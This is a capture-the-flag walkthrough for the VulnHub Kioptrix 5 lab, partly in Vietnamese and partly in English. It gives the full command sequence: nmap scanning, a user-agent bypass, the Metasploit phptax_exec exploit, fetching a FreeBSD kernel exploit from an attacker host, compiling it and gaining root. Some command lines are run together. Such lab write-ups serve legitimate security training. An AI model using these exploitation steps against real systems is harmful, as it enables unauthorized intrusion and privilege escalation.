Hack the Kioptrix 5 (CTF Challenge)

Trong bài này, chúng ta sẽ tìm hiểu về cách thâm nhập Kioptrix 5, phiên bản cuối cùng trong seri khá thú vị của Kioptrix, một bài tập hay đến nỗi mà OSCP Exam Lab đưa vào trong bài test của mình

Link download https://www.vulnhub.com/entry/kioptrix-2014-5,62/

• Network Scanning (Nmap, netdiscover)
• Dò xét các công HTTP service (80 & 8080)
• Xác định exploit cho các lỗi của Web app
• Exploit mục tiêu với Metasploit
• Get Root & Capture the flag.

Lưu ý : Sau khi chạy lab hãy remove card mạng trên máy ảo Kioptrix và add lại nếu gặp sự cố không nhận IP.

Hãy thư giãn nào các bạn !

Bắt đầu tìm kiếm mục tiêu :

#	netdiscover

Ta có mục tiêu là 192.168.1.159 , hãy nmap:

#	nmap -A 192.168.1.159

Kết quả cho thấy 1 cổng đóng là 22 và 2 cổng mở cho dịch vụ HTTP là 80 và 8080

Mở trang web http://192.168.1.159 ta thấy nó hoạt động như hầu như không có gì, hãy thử xem source code để xem có gì hấp dẫn hay không … Hãy dành 5 – 10 phút cho công tác này cho dù nó có thể vô ích.

• Không thấy gì cả !

Mở tiếp HTTP service đang lắng nghe trên cổng 8080 .

But the access was forbidden; however, the message didn’t seem to me as an error message. It seems more to be a message with the deliberate and intentional made-up response. I tried every method to bypass this forbidden access but nothing worked. Hence I decided to use User Agent switcher to check this page in other popular browsers like Internet Explorer.

Download the User Agent Switcher plugin in the Mozilla and perform the following

Navigate to Tools menu from the menu bar. A drop-down menu will appear. From this menu select Default User Agent. Another menu will open and from this select Internet Explorer, from this, another menu will open and from it select Internet Explorer 6.

And fortunately, we have access to the page. And found a file called phptax/

Now open this link and you will have the following page:

The page was of phptax. Phptax is a kind of CMS for Linux OS. Its aim is to develop a tax program which uses a database-less methodology that fits in one line text files. Using the phptax does not require SQL databases that are generally used in this program. And to our luck, there exists an exploit of phptax in Metasploit, for that simply type search phptax in Metasploit MSF Console.

To use this exploit simply type the following in Metasploit:

1234	msf > use exploit/multi/http/phptax_execmsf exploit(phptax_exec) > set rhost 192.168.1.159msf exploit(phptax_exec) > set rport 8080msf exploit(phptax_exec) > exploit

Great!! We got command shell session1 of the victim’s machine.

There is an exploit for this version of the kernel in exploit-db.com. Alternatively, we can also search with the help of searchsploit FreeBSD 9.0 command in the Kali Linux as shown below.

Copy the exploit from its default location to the Desktop:

1	cp /usr/share/exploitdb/exploits/freebsd/local/28718.c .

Here, we used fetch command because wget command wasn’t working. So, using fetch is a substitute for wget command and so we are directly using it from the browser. We compile the file, save it as the kernel and provide executable permissions.

123	fetch http://192.168.1.108/28718.cgcc –o kernel 28718.c  chmod 777 kernel

Then type the following command to execute the exploit :

1

./kernel

As the exploit executes you will reach the root. And to confirm this type :

1

id

Then moving forward go to the root folder by typing :

1

cd /root

Let’s see what directories it has and for that type :

1

ls

Here we have a congrats.txt named text file and I am hoping this will be our flag so to read it type :

1	cat congrats.txt